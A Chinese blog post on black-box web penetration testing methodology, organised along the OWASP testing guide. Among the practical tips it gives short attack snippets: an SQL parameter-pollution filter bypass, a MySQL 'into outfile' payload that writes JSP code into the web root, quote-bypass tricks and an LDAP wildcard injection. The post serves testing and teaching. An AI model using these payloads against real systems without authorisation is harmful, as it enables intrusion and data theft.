尽可能地探索Web服务器上运行的所有应用。有的时候同一个IP地址有可能映射到不同的web应用中,根据域名的不同也会映射到不同的web应用上去。我记得有一个HackTheBox上的题目就是虚拟主机,需要修改hosts文件,将另一个域名和ip绑定,才能访问到有漏洞的Web应用。

同一个IP下,根据URL可能会解析到不同的Web应用中去

对于这类隐藏的Web应用,如果没有机会浏览目录,就只能寄希望于爬虫/扫描器进行发现,或者在谷歌搜索的时候就可以发现site:www.example.com。

对于开放了多端口的Web服务器,我们可以使用Nmap等工具对全端口进行扫描,防止厂商将一些敏感入口配置到高端口,平时难以发现。

对于使用了虚拟主机的Web服务器,可以通过查询DNS记录或者是反向IP查询,找到这些隐藏的Web应用。借助在线工具即可。

识别应用入口

根据测试指南对本节的解释,主要是使用Burp拦截请求来测试参数,也就是传入应用的参数。根据实际经验,有一些参数是框架参数,几乎在所有的请求中都会存在。这些参数可的名称可能是符号或者是各种缩写,可以先针对这些频繁出现的参数进行测试。这样会为整个的测试流程大大的节省时间,也能搞清楚这些参数的意义,避免出现一大堆参数不知道该测哪一个的情况出现。

映射应用程序的执行路径

测试中面对一个庞大的Web应用,很难去做到代码库的测试全覆盖,只能尽力的去多测一些代码。根据测试指南上总结的,将提高代码测试覆盖率的方法总结为了三种:路径数据流和竞争。

从黑盒测试的角度来说,我们能看到的仅仅就是URL中的路径。一开始拿到应用的时候,最好能开一个excel表格或者带结构的记事本,来记录一下几条比较容易出问题的路径。昨天我在测试的时候发现了一个api接口的越权问题,推测应该是普遍存在的现象。但是由于我一开始没有对路径做记录,导致重新翻找的很痛苦。还有一点就是在记录路径/api的时候,一定要注明入口链接,不然找到最后找到漏洞点了,完全忘了是从哪里进来的。

识别Web应用框架

和识别Web服务器一样,知道应用框架可以从已知漏洞库入手,先过一遍。如果又惊喜就可以直接提交,有些地方因为业务比较特殊,无法按照框架提供厂商的修复建议修复,都是Web应用厂商自己修的,难免会有一些疏漏。如果测试的时候感觉不对劲,可以尝试进行绕过。

至于识别Web应用框架一是凭借自己的经验,比如你是一个经验丰富的测试者,测试过许许多多的框架了,通过一个页面或者一个报错提示就能分辨。有的时候厂商刻意的隐藏了框架特点,这种时候可以借用一些在线的工具来进行识别。

工具

  • netcraft。在线工具,识别Web服务器以及页面基本信息。What’s that site running?
  • Nmap。扫端口查服务、版本,用的时候对着手册看看参数就行。
  • BurpSuite。没啥好说的,2.0联动sqlmap和Xray挺好用的。
  • WhatWeb。识别Web应用。WhatWeb - Next generation web scanner.
  • BlindElephant。原理是根据静态文件不同版本的校验值不同来识别,所以精准度很高。BlindElephant

配置管理测试

对于渗透攻击,挖SRC的时候,对于配置的测试可能很少涉及到。但是在工作中,业务上线前必须要对配置的安全性进行核验。这里更多的是从厂商角度对即将上线的产品的配置安全与否做测试。在这其中涉及到一个很重要的安全思想,即安全的不可依赖性。比如我的Web应用有SQL注入漏洞,但是前端有waf防护,攻击者看起来并不能对Web应用造成伤害。但实际上这是不安全的,就如同串联电路一样,一个灯泡坏了一条电路的灯泡也不能亮了。同一个思想从Web应用层面迁移到Web服务器/网络配置层面,不能仅依赖于Web应用安全来确保服务器的安全,服务器自身的配置也要正确来确保安全的最大化。

网络与基础设施

首先识别所有的组件,确保这些组件不存在已知漏洞,并且用于管理这些组建的系统也不能存在漏洞。严格控制对于这些组件的访问,维护一个应用程序所需端口的列表。

对于服务器的测试很难做,一般都会使用一些自动化的工具或是脚本。在使用工具的时候也要慎重,可能会造成服务器宕机/拒绝服务,同样的情况也存在于对Web的测试中。自动化工具对Web服务器的测试存在漏报和误报,漏报是因为有些管理员为了隐藏服务器信息,将版本信息做了删除或者混淆,倒是工具无法正确检测服务器组件版本。误报是因为管理员对已知漏洞用补丁进行了修复,却没有更新Web服务器的版本。

作为测试人员在测试主机的时候,更多的是用扫描器扫描,报出来的多为一些弱加密套件,支持低版本协议等等,对于漏报的漏洞很难加以侦察。这里又用到了安全性不可依赖的思想,开发/运维人员应当遵守安全开发规则进行服务器配置,运维人员应及时修复新公布的漏洞,不能全依靠渗透测试发现漏洞。

应用平台配置

Web应用可能残留demo,测试页面。或者是在测试环境下为了方便所设置的一些配置,包括但不限于同账号同时登录,万能密码/验证码。

黑盒测试人员是没有配置指南的,所以测试起来会有些盲目。根据OWASP测试指南上的整理归纳,我结合我自己的测试总结了一下

  • 发送几个畸形参数,类似于负值,字符等等,检查Debug模式有没有关闭。
  • 继续发送畸形参数,请求不存在的文件,看返回页面不包含报错信息。
  • 看日志,增删改查是不是都在日志上,是不是遵守三员分立原则(admin, audit, user)。
  • 中间件的配置文件,网站的配置文件不能被访问
  • 查看管理员面板中的各种奇奇怪怪功能。

日志

日志文件重要性不言而喻,Web应用对日志的记录,管理,存储都要测试。

首先应该避免日志文件不能泄露敏感信息,与之相关的就是信息的加密,加密算法是否可靠都要在这里及逆行考虑。

日志是否只有日志审计员能看,日志是否不可被删除,审计日志的记录由谁来审计?这里涉及到三员分立的思想比较多。

日志是否存储在日志服务器上,日志是否设置了最大存储限制,达到了最大存储限制时怎么办?

敏感文件

开发完成后上线应用时对敏感文件的清理不彻底,更新之后敏感文件清理不彻底等多种情况会造成敏感文件泄露。可能是服务器配置文件,可能是源代码泄露。测试的时候一是凭借经验,二是靠扫描器扫到,三是偶尔可以从注释里面发现(不过现在扫描器也会顺便扫一下注释内有没有敏感内容),还有就是Google hacking。有的时候虽然删除了敏感文件,但是因为之前存在过导致敏感文件位置会残留在Google hacking数据库里,可以进行同类文件推断。

HTTP方法测试

HTTP的其他方法可能会对Web应用程序造成安全问题

  • PUT方法允许攻击者上传文件到服务器,最经典的IIS PUT漏洞。
  • DELETE方法允许攻击者删除服务器上的文件。
  • CONNECT允许攻击者将Web服务器作为代理。
  • TRACE一开始被认为无害,后被发现可以被用于跨站跟踪(CST)。

测试的时候使用OPTIONS请求检查一下都支持什么请求,或者一个一个试一下也行。注意一下一些框架允许使用HEAD方法代替GET,会造成基于角色的访问控制越权,另外GET和POST两个方法替换越权也要注意测试一下。

目前绝大多数厂商都要求了强制HTTPS,测试一下HTTP是否能用

身份管理测试

这里所说的身份管理并不特指为权限管理,更多指向的是在用户注册过程中所涉及到的一些管理相关的测试。

注册

我们熟知的网络应用注册功能可以大致分为几种

  • 后台注册,不开放注册接口
  • 邀请码注册,例如XssPlatform,t00ls
  • 手机号/邮箱注册
  • 账号密码注册

对于渗透测试来说,第一种后台注册不在我们的测试范围之内,或者说不在本节所讨论的测试范围之内。这种注册涉及到的弱口令,测试口令残留等等可以放在后面的认证测试之中。

邀请码注册中,主要的问题在于邀请码的安全性。是否可猜解?是否可以重复使用?获取验证码的过程如何?如果验证码中包含了所注册用户应有的权限自不必说,如果邀请码仅仅是验证用户拥有注册资格,而不决定用户权限的时候,安全性就要和下面两个一起讨论。

手机号,邮箱,乃至社交平台注册是当今最流行的一种注册方式,与前面两个相比,这种注册是面向任何人开放的。在做测试的时候主要针对一下几个方面

  • 同一个用户/身份能否多次注册
  • 能否注册多种权限的用户
  • 输入的邮箱/手机是否进行了验证

关于最后一种账号密码测试,其实与第三个类似,不同点在于账号分为系统发放和用户输入。系统发放的账号既要关注账号的随机性和不可预知性(视情况而定是否需要),用户输入的话就是要验证重复和是否符合统一格式。

账户枚举

通常在测试的时候出现横向越权漏洞,我们会去搜集其他用户的身份鉴别符,类似于UID等等的信息。对于Web应用来说,这种用来鉴别用户的敏感参数原则上要保证它难以被枚举。举例微信的用户id就是十分复杂难以被枚举的,感兴趣的朋友可以去看一看。

那么作为测试人员,可以用下面的几种方法来尝试收集用户标识

  • Web应用响应。发送HTTP请求的时候更换uid观察response是否一致,或者说会不会提示用户不存在。响应的范围还可以是报错,404/403/200等等。
  • URI中收集。有些Web应用使用了路由功能,可以从URI中看到。这时可以找到类似于好友列表,关注/粉丝列表,评论区等等出现其他用户的地方进行收集
  • 规则推测。注册多个用户来推测用户名生成的原理,一般都会有时间戳、注册信息的介入。

认证测试

认证,指的是确定或证实一个人或者事务的行为是真实可信的。在网络安全中,认证是企图验证通信发起者数字身份的过程。比如登录就是一个最简单的验证过程。而相对安全员来说,测试验证就意味着要理解验证模式,测试能否利用漏洞或者策略绕过认证。

传输测试

现在的但凡是有点规模的厂商推出的Web应用产品都应该强制支持HTTPS。在黑盒测试中我们主要关注在数据传输的过程中,比如登录页输入用户名密码的时候,是不是通过POST请求强制使用HTTPS协议发送的。

首先必须是HTTPS请求,为了防止课本上经常看到的MITM攻击,也就是中间人攻击。谁也不想大家在咖啡厅,被隔壁桌子的黑客搞了个arp欺骗转发,然后你访问了个HTTP网站,所有的访问记录裸奔在黑客的电脑上。这个防范措施真的不可小觑,因为出了家里或者单位,没有人回到了一个地方就将网关写死,arp欺骗总是防不胜防。

其次为什么要使用POST请求而非GET请求,虽然HTTPS处在七层协议的第五层,GET请求中的数据也是被加密保护起来的,但是GET请求中的URL记录经常会被保存在日志文件、访问记录中,而且一般也是明文存储,增加了敏感信息被泄露的风险。

最后就是要验证referer也要是HTTPS的网页,不然会存在SSL-Strip攻击。

账号密码测试

首先就是密码强度测试,一般的Web应用如果有注册功能都会要求使用8位以上数字+字母+一位大写+特殊字符的模式。对于黑盒测试来说,可以在创建账号密码的地方看一看密码规则来测试。

然后就是弱口令测试,一般在开发阶段,开发人员都会用一组便于输入的密码来登录。同时有些Web应用登陆的时候要求输入验证码,开发人员也会为了方便留下一组万能验证码。我们测试的目的就是要找到这些可能存在的弱口令。另外管理员创建的新用户是不是使用了默认密码,第一次登录是不是强制要求修改密码等等。

另外一个角度就是锁定,比如当输入密码超过多少次错误的时候锁定账号多久,具体策略应该和Web应用的敏感程度有关,但毫无疑问应该存在这一机制避免密码被爆破。

认证绕过

这里仅仅讨论一些认证功能的绕过,越权等问题不在这里做讨论。绕过登录框最常见的手段还是SQL万能密码注入。另外上古时代还有一些网页不做登陆验证,明明应该是登陆之后的展示页,结果在浏览器里输入URL就可以直接访问。现在还有一些鉴别登陆状态的方法是通过参数,类似于“authorized”等等,还有些开发人员自作聪明,将这类字段换个名字,或者写在Cookie里面,感觉很难被发现,其实一碰就碎。

授权测试

这个授权测试不是说你的测试经过授权,而是对授权本身进行测试。其实我认为叫鉴权测试更好,但是OWASP指南上这么写的,我也就照搬了。

目录遍历/文件包含

黑盒测试的时候要找到这样的测试点,主要关注

  • 是否存在用于文件操作的请求参数
  • 是否存在异常的文件扩展名
  • 是否存在有趣的变量名称
  • 是否可以确定Web应用通过Cookie动态生成页面内容

我们见得多的都是在CTF题目里发现了目录遍历或者是最后RCE需要文件包含,但是在测试中这些利用简单,修复简单的漏洞很难跑到公网上去,因此我们在留意URL的同时,还要注意一些接API接口。现在前后端交互经常使用json,xml等等,这些数据中的参数也可能是文件标识符,有时候多关注这些地方会有意外的收获。这里有点像最后一条Cookie内容动态生成网页,本质上也是文件标识符写在Cookie里面。

这里当然在测试的时候有一些技巧,需要熟悉Web环境,针对不同的服务器/中间件构造不同的测试payload。这里还有一个好玩的漏洞,叫做相对路径覆盖,天师同学写过一篇文章讲的很清楚。

RPO攻击方式的探究 - FreeBuf网络安全行业门户

前几天测试的微信小程序,上传图片之后将图片存储到了专门的文件服务器,返回包中有图片存储地址,跟进去一看有目录穿越。感觉目录穿越就是要多加小心,没啥技术可言,仔细找总能碰到。

授权绕过

账号注册再注销是否还能使用功能?支持同时在线的账号一个PC下线了另一个是否能使用功能?访问高权限页面被拒绝是否跳转?前端是否泄露信息?API是否未授权使用?

对于最后一个API问题其实大量存在,这需要有一个好的开发。我前两周测试的一个系统,初测的时候反馈了API未授权问题,结果复测发现反馈的API修了,其他API还是未授权。发现此类问题最好跟开发一起进行API的稽查,统一使用一套鉴权逻辑。

对于绕过权限判断逻辑的方法有很多种,出了最基本的替换id,参数等等,还可以替换HTTP方法从POST改GET之类的。

还有一些逻辑上的问题例如修改密码页面/注册页面氛围Page1到5,但是没有经过page3就可以直接在地址栏里输入page4跳转等等。

权限提升

根据三元分离法则,一套业务系统氛围管理员,审计员和用户,也可以将未登陆用户算成一种角色。在测试的时候,根据不同业务系统区分出所有的角色并梳理出各自可以使用的功能。举例来说,所有公司都会有客服热线电话。这种客服电话并不是用手机接听的那种,而是接入一套客服电话系统分配给所有的业务员进行接听。各位可以想象一下这套业务系统会有什么样的角色?首先三元分立模型中的管理员和日志审计员是必须存在的,用户这个角色在这个场景科技进行拆分。首先是前台接线员,他们应该没有权限查看用户的个人资料以及用户所咨询设备的信息,他们只负责听取用户的需求并将用户转接到对应话务员。前台接线员应该能查看所有业务员的接入编号与信息。具体的业务员接到客户电话后应该可以查看客户信息以及自己部门所负责的业务设备信息,不能查看别的部门。

再举一个例子,一套SRC系统应该分别设立几个角色呢?首先还是三元分立原则,其中的用户又可以分为两种:企业和白帽子。白帽子可以向对应的企业提交漏洞,但是只能查看自己提交的漏洞。可以查看其他白帽子的部分信息。;企业可以查看所有自身相关的漏洞,不能查看友商。除此之外还有未登录用户,他们不能查看白帽子的信息,但是可以浏览部分内容等等。

诸如此类的,核心思想就是要理清每一套系统的角色功能特点,再进行测试。

具体在测试过程中要注意不是看不到就不存在越权,直接输入仅高权限用户可查看的URL或许可以访问。高权限用户在高权限页面的一些操作例如刷新、编辑、点赞等等都可能出现越权造成信息泄漏,注意留心。

会话管理测试

任何机遇Web的应用程序的核心组件是用来控制和维护网站用户与其交互状态的一种机制,这种机制被称作会话管理,直观讲就是Cookie和Session。渗透测试中如果能够拿下Cookie就约等于拿下了账号,不过现在安全性高的系统都会避免这种情况的发生,将替换Cookie就可登录归为了一种漏洞叫做Cookie越权。但是在绝大多数中小型公网系统上普遍存在替换Cookie登陆,因此Cookie的安全性至关重要。

会话框架绕过

Cookie中会保存一些信息比如用户id,权限标识,token等等,但通常是经过算法进行加密的。首先可以从前端JS代码中找找有没有泄露Cookie生成逻辑的,一遍扫描器就可以发现。如果没有的话可以尝试搜集大量Cookie寻找一定的规律进行暴力破解攻击,但是此种方法极其不推荐,效率太低了,在日常繁重的渗透测试中我认为完全没有必要。

还有一种思路,虽然所有的传输数据包中都带着Cookie,但是有些地方对Cookie的验证非常奇葩,删掉Cookie也可能导致绕过。

数据包中的Cookie强制要求加密传输,如果不加密安全性几乎为0。特殊情况就是Cookie中有一个8位以上随机的用户id,后台根据id鉴别权限。

Cookie属性

Chrome有个插件叫做Edit This Cookiehttps://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg/related?hl=en-US可以查看Cookie中的属性。以CSDN为例,上面可以修改Cookie对应每一个Key的Value值,下面可以查看Cookie中的几个关键属性是否进行了设置。这里的Cookie是未登陆状态。

Secure属性是高速浏览器只在请求通过HTTPS的安全通道发送时才加入Cookie,这可以防止Cookie明文传输;HttpOnly属性可以防止XSS获取Cookie,不允许客户端通过脚本语言例如Js操作Cookie;Domain属性应该设置为需要接受改Cookie的服务器,注意要特指到某一个服务器上,而不是整个2级,3级域名;Expries属性管理Cookie过期时间,要把此项值设置到一个合理的区间上。

会话固化测试

当应用程序在用户成功认证之后未更新会话Cookie,攻击者就有可能找到一个回家固定漏洞,迫使用户使用攻击者已知的Cookie进行登陆。这样当登录成功时Cookie没有发生变化,用户的Cookie自然就泄漏了。测试过程中注意观察登陆成功前后Cookie有没有发生变化。

CSRF

CSRF漏洞也属于会话管理不当导致的。这里就不介绍CSRF的原理了,不知道的可以自行查询。在实际挖掘的过程中,我们要重点关注核心功能处是否存在CSRF。比如修改密码,重置密码,转账,购买,删除,添加等等。这里是一个非常繁琐的过程,不能仅仅从数据包里有没有Refer字段来判断,因为有些应用由团队开发,不同的程序员负责不同的功能模块,程序员的安全开发水平不尽相同。有些程序员不会对数据包中传输的Refer字段做校验。

这里我分享一下我的经验。在渗透测试过程中,每开始测试一个新功能/模块,我都会进行SQL注入/XSS的尝试。有些安全开发水平比较高的程序员会进行SQL语句参数化查询,XSS前端转义的防御方法。对于这种安全水平很高的程序员开发的模块,我会去验证一到两个CSRF漏洞是否存在,如果都对Refer进行了校验那么我就会认为这个模块不存在CSRF。而对于还存在SQL注入过滤关键词,XSS黑名单过滤等等不是很安全的防御方法所在的模块,我会尽可能的去测试每一个有CSRF漏洞的点。这个经验虽然不能有助于提升CSRF检测的准确性,但是可以大大的提升整个渗透测试流程的效率。

CSRF存在于每一个GET/POST请求,JSON格式的数据也可以有CSRF,这里分享我写的另一篇文章JSON情境下的CSRF攻击。使用BurpSuite集成的CSRF POC Generator可以快速的生成测试POC。

输入验证测试

我在学习渗透测试的过程中听到的第一句话就是“所有的输入都是不安全的”,这句话很经典,是我们在渗透过程中的心法。SQL注入、XSS、文件上传、RCE等等都是源于用户的输入,本节主要总结的就是面对各种各样的接受输入的功能,作为测试者怎样快速精确的找到漏洞。

XSS

XSS可能是大家在渗透测试中最经常见到的漏洞了,从测试方法来说没有什么稀奇的。如果前端转义了就可以不看,过滤的话就Fuzz一下看看。我认为XSS在测试中更重要的是覆盖面一定要广,有机会写入HTML的地方都要试试XSS。不仅仅是评论区,比如上传图片/文件名称,还有各种想不到的地方。我见过最奇特的一个XSS是一个调度公告栏,在编辑公告的页面发送编辑数据包,其中有一个key叫做class,大概是分类的意思。我在这个key对应的value地方尝试加入XSS,发送后在该页面没有XSS显示,甚至没找到回显在哪。当我后退到浏览所有公告标题的页面时出发了XSS,F12看了一下源码发现class得value在这个页面被插入到了HTML代码中。

更自动化一些的XSS测试建议使用Xray联动,P牛主持开发的被动扫描器真的非常好用,缺点是会插入几百条XSS,如果后续还要对该功能测试可能会有些麻烦。

HTTP方法篡改

在HTTP1.1所有的HTTP请求方法,除了第一条其他的都尽量禁止。

  • GET、POST 正常业务支持的方法
  • OPTIONS 查询支持的HTTP方法,在不同目录下执行可能会有不同效果
  • PUT 可以用此请求想服务器上传文件
  • DELETE 可以删除文件
  • TRACE 可以穿越防火墙和代理,回环诊断
  • CONNECT CONNECT方法是HTTP/1.1协议预留的,能够将连接改为管道方式的代理服务器。通常用于SSL加密服务器的链接与非加密的HTTP代理服务器的通信。

大多数情况HTTP危险方法都可以由扫描器直接发现,扫描器的覆盖面肯定要比人来得更广。当有些业务系统需要登录才能访问某些路径而扫描器不支持登陆扫描的时候,要收工对这些登陆后可访问目录进行测试。

HTTP参数污染

多个HTTP参数使用相同的名称可能导致应用以不可预料的方式运行。该漏洞曾经对ModSecurity SQL注入的核心规则库造成了影响。ModSecurity过滤器可以正常过滤字符串select 1,2,3 from table,所以当次字符串出现在URL中进行GET请求查询数据库的时候会被过滤。但是攻击者可以让ModSecurity过滤器接受多个同名输入,可以构造这样的URLhttp://domain/?query=select 1&query=2,3 from table不会出发过滤器,但是在应用层可以组成完整的SQL查询语句。

这里是不同语言/中间件对于同名参数的处理方式,有些是在中间加上如逗号的特殊符号分割,有些是只取第一个,有些只取最后一个。

测试的时候根据此表比对进行测试。

SQL注入

SQL注入相信大家一定不陌生,这个应该是学习安全入门的第一个漏洞,也是被讨论的最频繁的漏洞之一,早起比较猖獗,随着安全意识的提升SQL注入漏洞的数量在下降,但是依然存在。原理就不细说了,具体的测试、绕过技术也不详细讨论,网上能找到的已经足够用了,本节只谈谈对于寻找SQL注入的经验和提升效率的方法。

拿到一套业务系统,首先要熟悉这套业务系统的发包参数。如同代码审计先看安装文件和路由一样,黑盒测试虽然看不到代码,但是可以看到一些几乎存在于每一个数据包,或者绝大多数数据包中的参数。首先对这些参数进行SQL注入的尝试,这样后面再遇到同样的参数就可以跳过。其次尽量找到一些很不明显的和数据库有交互的参数点,不要漏过每一个数据包。

建议使用BurpSuite插件联动SQLmap,有件直接将数据包发送到SQLmap中跑一遍,很有效率。插件的名字叫做``。

另外就是二次注入是一个很容易被忽视的点,要结合具体的业务系统进行分析。

如果存在SQL注入漏洞,并且用户拥有写文件权限并且单引号不被转码,可以使用select * from table into outfile '/tmp/file'写文件,这种攻击可以作为一个额外技术,获取一个查询的结果信息或写入文件,可以在Web服务器的目录执行1 limit 1 into outfile `/var/www/root/test.jsp’ FIELDS ENCLOSED BY `//‘ LINES TERMINATED BY `\n<%jsp code here&>’;,这样就使用MySQL用户的权限创建了一个文件,里面包含以下内容

1
2
//fiedl value//
<%jsp code here%>

load_file是一个用来读取本地文件的函数,如果用户拥有文件读权限的话,可以使用这个函数来读取文件。

对于单引号,MySQL终有一个标准的方式绕过单引号,加入想获得Password字段的值password like 'A%',可以使用ASCIIpassword like 0x4125,也可以password like char(65,37)

LDAP测试

我在很早以前曾经复现过一次LDAP注入的漏洞CVE-2017-14596,当时是为了完成红日安全代码审计小组的任务,所以就没有发在博客上,现在很可惜原稿已经找不到了。LDAP是一个轻目录访问协议,Windows域内的认证方式就属于LDAP的一种。LDAP查询有自己的独特的一套语法,如果是刚接触渗透测试时间不久的同学可能还不太了解,我在这里简单介绍一下。

LDAP协议中会用带很多缩写

  • dn(Distinguish Name) 一条位置的记录,对比SQL来说就是一条查询语句,在LDAP中表示一个位置
  • dc(Domain Component) 一条记录所属的区域,域名部分
  • ou(Organization Unit) 一条记录所属的组织
  • cn(Common Name) 用户名或者服务器名

假如有一个Web应用程序使用了一个搜索过滤器

1
searchfilter="(cn=" + user +")"

从URL的角度看传参是这样的

1
http://domain.com/ldapsearchfilter?user=

如果我们在user后面不输入用户名,而是用一个*代替,在查询代码中就会变成

1
searchfilter="(cn=*)"

这样就变成了通配符,辉县市全部用户的属性或者部分用户,这就要去绝育应用程序的执行流了。

我本人测到的LDAP注入也仅仅只有两个,都是在进行用户身份认证的时候发现的,使用(、\、| 、& 、*等等字符可以测试出LDAP注入。我个人建议使用Burpsuite的Intruder功能,在SQL注入前面加上LDAP注入的测试自负,fuzz一下就可以测出结果。

XXE

XXE本身需要服务器解析XML文件,在测试的过程中经常看到返回包中的Accept-Content字段中包含XML,但并不是只要包含了XML就能解析,这个需要手动的去测试一下,有时候经常在文件上传的位置发现XXE。

在测试XXE的时候最好找开发要一个处在同一个网段下的服务器来作为接受带外数据的服务器。因为绝大多数XXE是没有回显的,需要查看Web日志从而获取带外数据信息。开发网和外网是隔绝开的,用外网VPS是接不到带外数据的。

代码注入

有些Web功能页面允许用户在Web页面输入代码,并触发Web服务器执行该代码。在代码注入测试中,测试人员提交输入,然后Web服务器把这些输入作为动态代码或者包含文件接受处理。这里所指的代码注入包含了常说的命令注入,经常在Web后台发现。不仅仅是Web应用,有些主机设备的后台管理页面也频繁出现代码注入功能。与Web不同,主机设备的更多是对终端Shell的命令注入,因为主机设备往往不配备数据库,而是使用命令行进行身份认证或是代码执行。

Web应用上的代码执行更多的是要凭着敏锐的嗅觉找到有可能命令执行的点。这里我把Web应用分为两个大类,第一类就是大开源CMS,类似于ThinkPHP、WordPress、Laravel等等。这一类的开源CMS大多是经历过无数的安全专家进行代码审计以及漏洞挖掘,如果不是功底深厚很难挖掘到代码注入的问题。如果在工作中遇到此类的二次开源CMS,需要重点关注与原生CMS不同的新增功能,调用原生的过滤函数是否恰当,从黑盒的角度就是要去测试新增的与原始CMS不同的功能页面。第二类则是自己开发的Web应用,这些应用中存在代码注入的可能性远远大于第一类,从前端黑盒的角度去推理后端功能代码,找到可能存在代码注入的点进行测试。这种测试要多多寻找,因为你不知道开发的思路是多么的清奇(无贬义)。

测试代码注入的时候最有效率的方法我认为是连同SQL注入、LDAP注入一起进行Fuzz测试,加入一些例如sleep之类的命令,不得不说Fuzz测试总能带给人惊喜。

缓冲区域出

严格来说缓冲区溢出也算在注入类漏洞里面,但是我认为缓冲区溢出靠手工测试很难测出,也许是我能力不够才会有这样的想法。在现代SDLC中,黑盒测试之前是白盒代码审计,缓冲区域出应当扼杀在代码审计的过程中。在黑盒测试的时候,通过扫描器也可以发现缓冲区溢出漏洞,DOS也是同理。

文件上传

文件上传漏洞从寻找的角度来说是非常容易寻找的,因为上传功能从会出现在那么几个固定位置上,头像上传,个人资料上传,数据表但上传等等。但是根据我的经验,我认为文件上传的定义应该再广一些。有些日志可以写入,这样如果日志文件路径暴露也会存在利用危险。还有些工程管理类型的应用也可以创建工单,如果工单存储为一个单独的文件也可以归类为文件上传。有些语言例如CSS,不需要一个完整的文件都符合CSS语法,只需要其中的一部分符合即可。